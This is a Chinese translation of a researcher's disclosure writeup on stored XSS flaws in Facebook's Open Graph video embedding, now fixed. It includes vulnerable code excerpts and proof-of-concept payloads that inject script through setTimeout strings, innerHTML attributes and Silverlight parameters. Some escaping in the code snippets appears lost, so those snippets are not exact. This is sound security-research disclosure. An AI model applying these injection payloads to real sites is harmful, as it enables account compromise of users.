Open Graph协议
当您在Facebook发帖中添加URL时,Facebook将使用Open Graph协议 显示丰富的内容。以下是关于Facebook如何使用OG在Facebook帖子中嵌入外部内容的大致流程:
许多网站也使用OG工作流,包括Twitter和WordPress等。
步骤#2很敏感:服务器端读取用户提供的URL,这通常会导致SSRF。
如果托管网站在敏感网页上使用X-Frame-Options:SAMEORIGIN并允许攻击者在同一子域中注入任意iframe,则会造成潜在的点击劫持漏洞。
FB不容易受到这些问题的影响
有趣的部分在步骤#4:在受害者点击播放按钮后,FB加载视频时。首先,FB会发送一个XHR请求来获取视频类型和视频文件URL,它们都是由攻击者在ogvideo:type(我们称之为ogVideoType)和og:video:secure_url(ogVideoUrl )由攻击者发布的URL的标签。以下是OG元标记的示例:
<!DOCTYPE html>
<html>
<head>
<meta property="og:video:type" content="video/flv">
<meta property="og:video:secure_url" content='https://example.com/video.flv'>
<meta property="og:video:width" content="718">
<meta property="og:video:height" content="404">
<meta property="og:image" content="https://example.com/cover.jpg">
(...)
</head>
<body>
(...)
</body>
</html>
If ogVideoType is “iframe” or “swf player” then FB loads an external iframe and doesn’t handle the playing of the video. Otherwise, FB was using MediaElement.jsto handle the loading of the video directly on facebook.com. I already reported and disclosed vulnerabilities on the Flash component of ME.js on both Facebook and WordPress.
如果ogVideoType是“iframe”或“swf player”,则FB会加载一个外部iframe并且不处理该视频的播放,而是直接使用MediaElement.js在facebook.com上处理视频加载。我已经报告并披露了ME.js的Flash组件在Facebook 和WordPress上的漏洞。
使用FlashMediaElement.swf造成的存储型XSS
MediaElements.js根据ogVideoType会有多种播放视频的方式。
如果ogVideoType是“video / flv”(flash视频),则Facebook在facebook.com上加载Flash文件FlashMediaElement.swf(使用<embed>标签),并将ogVideoUrl传递到FlashME.swf进行视频播放。FlashME.swf然后将日志信息发送到facebook.com(使用Flash-to-JavaScript)关于“视频播放”或“视频结束”等事件。FlashME.swf正确处理了Flash-to-JavaScript的通信,特别是被正确转义为\以避免XSS。
但是,发送的JavaScript代码是:
setTimeout('log("[VIDEO_URL]")', 0)
在Javascript中setTimeout与eval类似,它会将字符串转换为指令,使其非常危险
[VIDEO_URL]由攻击者控制,它是ogVideoUrl的值。如果它包含“例如
http://evil.com/video.flv?"[payload]
Flash会将以下指令发送给javascript:
setTimeout("log(\"http://evil.com/video.flv?\"payload\")", 0);
如您所见,“ in video.flv?”payload已正确转义,因此攻击者无法逃离setTimeout函数。
但是,当JavaScript执行setTimeout函数时,它将执行以下JavaScript指令:
log("http://evil.com/video.flv?"[payload]")
而这次“不再逃脱,攻击者可以注入XSS!
现在的问题是,Facebook在将ogVideoUrl传递给FlashME.swf之前是否会转义l。
首先,Facebook JavaScript向Facebook服务器发送XHR请求以获取ogVideoType和ogVideoUrl的值。ogVideoUrl的值是正确编码的,但它可以包含任何特殊字符,例如:
https://evil.com?"'<
然后,在发送到Flash之前,ogVideoUrl进行了如下转换:
function absolutizeUrl(ogVideoUrl) {
var tempDiv = document.createElement('div');
tempDiv.innerHTML = '<a href="' + ogVideoUrl.toString().split('"').join('"') + '">x</a>';
return tempDiv.firstChild.href;
}flashDiv.innerHTML ='<embed data-original="FlashME.swf?videoFile=' + encodeURI(absolutizeUrl(ogVideoUrl )) +'" type="application/x-shockwave-flash">';
absolutizeUrl(ogVideoUrl)的结果 在发送到Flash之前进行了URL编码,但当Flash接收到数据时,它会自动对其进行URL解码,因此我们可以忽略encodeURI指令。
absolutizeUrl使用当前的javascript上下文的协议和域(Domain)来将相对URL转换为绝对URL(如果提供了绝对URL,则返回它几乎不变)。这似乎是“哈克”,但它看起来足够安全和简单,因为我们让浏览器做了艰苦的工作。但当存在特殊字符编码时,这并不简单。
当最初分析这段代码时,我使用的是Firefox,因为它有很棒的扩展,比如Hackbar,Tamper Data和Firebug!
在Firefox中,如果你尝试
absolutizeUrl('http://evil.com/video.flv#"payload')
它会返回
http://evil.com/video.flv#%22payload
所以我被难住了,因为在Facebook中,由Flash发送的JavaScript指令会是
setTimeout("log(\"http://evil.com/video.flv?%22payload\")", 0);
这将导致
log("http://evil.com/video.flv?%22[payload]")
这不是一个XSS。
然后我尝试了Chrome和
absolutizeUrl('http://evil.com/video.flv#"payload')
返回:
http://evil.com/video.flv#"payload
和 o / YEAH !!!!!
现在Flash发送
setTimeout("log(\"http://evil.com/video.flv?\"payload\")", 0);
到Facebook的JavaScript和哪些将导致
log("http://evil.com/video.flv?"[payload]")
所以如果ogVideoUrl设置为
http://evil.com/video.flv#"+alert(document.domain+" XSSed!")+"
那么Facebook将执行
log("http://evil.com/video.flv?"+alert(document.domain+" XSSed!")+"")
并会显示一个不错的小警告框,说“facebook.com XSSed!”
这是由于浏览器解析URL时,不同的浏览器在特殊字符编码上有所不同:
正如你所看到的让浏览器决定如何在JavaScript代码中的URL中进行特殊字符编码并不是很好!
我立即将此漏洞报告给Facebook,他们在第二天回复并告诉我他们修改了Flash文件,以便它不再使用setTimeout,Flash现在会发送
log("http://evil.com/video.flv?\"payload")
正如你所看到的“正确地转义到”,所里这里不再有XSS。
无Flash存储XSS
上面的的XSS需要Flash,所以我检查这里能否有一个不使用Flash的payload。
如果ogVideoType是“video / vimeo”,则会执行以下代码
ogVideoUrl = absolutizeUrl(ogVideoUrl);ogVideoUrl = ogVideoUrl.substr(ogVideoUrl.lastIndexOf('/') + 1);playerDiv.innerHTML = '<iframe data-original="https://player.vimeo.com/video/' + ogVideoUrl + '?api=1"></iframe>';
正如你可以看到 absolutizeUrl(ogURL)在注入playerDiv.innerHTML之前没有被urlencoded,所以当ogVideoUrl设置为
http://evil.com/#" onload="alert(document.domain)"
playerDiv.innerHTML则会变为:
<iframe data-original="https://player.vimeo.com/video/#" onload="alert(document.domain)" ?api=1"></iframe>
这又是Facebook.com上的XSS!
我在前一个XSS被修复的同一天报道了这一点,Facebook在同一天用如下方法修复了漏洞:
ogVideoUrl = absolutizeUrl(ogVideoUrl);ogVideoUrl = ogVideoUrl.substr(ogVideoUrl.lastIndexOf('/') + 1);playerDiv.innerHTML = '<iframe data-original="https://player.vimeo.com/video/' + ogVideoUrl.split('"').join('"') + '?api=1"></iframe>'
第二天,我发现了另一个易受攻击的点:当ogVideoType是未知的类型,比如“video / nothing”时,Facebook会显示一条包含ogVideoUrl链接的错误消息,如下所示:
errorDiv.innerHTML = '<a href="' +absolutizeUrl(ogVideoUrl ) + '">'
所以ogVideoUrl 的payload设置为
https://opnsec.com/#"><img/src="xxx"onerror="alert(document.domain)
errorDiv.innerHTML则会变为:
<a href="https://opnsec.com/#"><img data-original="xxx" onerror="alert(document.domain)">
我把它报告给了Facebook,非常欢乐的是,来自Facebook的白帽子Neil告诉我,他计划在第二天检查这些代码!
另一种可能的ogVideoType是“silverlight”。Silverlight 是微软公司的浏览器插件,它能与VBscript交互,就像Flash和JavaScript交互。
在Facebook(silverlightmediaelement.xap)上托管的silverlight文件是这样加载的:
params = ["file=" + ogVideoUrl, "id=playerID"];silverlightDiv.innerHTML ='<object data="data:application/x-silverlight-2," type="application/x-silverlight-2"><param name="initParams" value="' + params.join(',').split('"').join('"') + '" /></object>';
silverlightmediaelement.xap然后会发送日志信息到Facebook的JavaScript(这点有点像Flash),但这次它不包含ogVideoUrl,但只有player ID,这是另一个在initParams中发送由Facebook定义的参数。Silverlight会调用javascript函数[id] _init() ,其中[id]是“playerID”。
在Silverlight中,参数不是由 URLs或Flash中的&所分隔,而是通过逗号(,)
如果ogVideoUrl 包含一个逗号( ,)那么在这个逗号后面的每一个东西都将被silverlight视为另一个参数,这意味着使用有效载荷
https://opnsec.com/#,id=alert(document.domain)&
然后silverlight像这样加载:
silverlightDiv.innerHTML ='<object data="data:application/x-silverlight-2," type="application/x-silverlight-2"><param name="initParams" value="file=https://opnsec.com/#,id=alert(document.domain)&,id=playerID" /></object>';
Silverlight将仅考虑id的第一次出现,并将其值设置为
alert(document.domain)&
然后Silverlight将调用以下javascript:
alert(document.domain)&_init()
这意味着再次 XSS!
结论
我学到了很多东西,并且发现这些漏洞非常有趣。我希望你也喜欢它!
以下是一些建议:
Open Graph(以及像json-ld这样的替代品)是在网站上显示丰富的外部内容的好方法,但你应该小心使用(认为SSRF,XSS和Clickjacking)
不要让浏览器在您的JavaScript代码中为您解析URL,每个浏览器都以自己的方式处理它,并且浏览器可以随时更改其行为(如Chrome 64 – > 65)。应该改为使用白名单正则表达式。
现在的自动工具不会检测到使用XHR,DOM突变和外部内容的复杂动态XSS。所以即使是最安全,最有影响力的网站也可能会受到攻击。代码审查和调试是实现这些目标的方法!
不要害怕大的、压缩过、动态的JavaScript源代码。如果您在网站上发现一些潜在的危险功能,您可以放轻松的检查它是如何实现的。
原文:https://opnsec.com/2018/03/stored-xss-on-facebook/